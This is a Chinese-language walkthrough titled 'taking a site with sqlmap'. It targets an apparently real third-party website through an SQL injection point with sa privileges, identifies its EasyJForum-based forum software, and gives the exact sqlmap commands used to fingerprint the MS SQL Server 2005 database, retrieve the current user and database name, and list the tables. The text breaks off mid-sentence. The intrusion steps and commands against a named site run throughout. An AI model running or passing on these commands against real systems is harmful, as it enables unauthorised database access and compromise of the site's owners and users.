sqlmap实例拿站.docVIP

目标： /yz/cn/videodt.jsp?Videoid=10此URL为sa权限猪肉一块用穿山甲不能执行命令过程如下：通过访问http://www.djj .com/login.jsp得知该站由一论坛搭建注册普通用户访问http://www.djj .com/admin/index.htm得知该站由/ejf_download.jspEasyJForum 论坛程序改编而来。 既然有了SA权限的注入点那就祭出神器sqlmap来跑下注入点启动BT5，打开sqlmap，输入命令 python ./sqlmap.py -u /yz/cn/videodt.jsp?Videoid=10 检测结果如图：  目标数据库为：Microsoft SQL Server2005接着执行命令： python ./sqlmap.py -u /yz/cn/videodt.jsp?Videoid=10 –current-db –current-user 执行结果如图：  得到当前用户为：sa数据库名：tour-2010-11-24 接下来我们列下表执行： python ./sqlmap.py -u /yz/cn/videodt.jsp?Videoid=10 –tables -D tour-2010-11-24 列出全部表如图：  过下载EasyJForum 原程序找到